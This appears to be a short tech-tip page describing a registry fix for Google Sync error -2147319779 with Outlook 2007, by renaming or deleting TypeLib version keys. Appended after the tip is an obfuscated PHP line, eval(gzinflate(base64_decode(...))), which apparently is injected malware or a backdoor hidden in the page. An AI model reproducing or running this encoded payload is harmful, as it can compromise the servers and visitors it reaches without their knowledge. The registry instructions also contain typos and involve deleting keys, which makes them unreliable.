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google sync error -2147319779

When running / installing Google Sync you might encounter error -2147319779 when trying to sync with your google calendar.

Try this to fix it.

Start > RUN > Regedit

Search for: Computer/HK_CLASSES_ROOT/Typelib/{00062FFF-0000-0000-C000-000000000046}

Make sure Outlook and Google Sync of stopped.

Rename 9.3 and/or 9.4 to anything i.e 9.3old / 9.4old.

If this does not work. Export the key and delete it form the registry.

(In my case Windows 7, Outlook 2007 9.4 had to be deleted, rename did not to the trick)

eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?>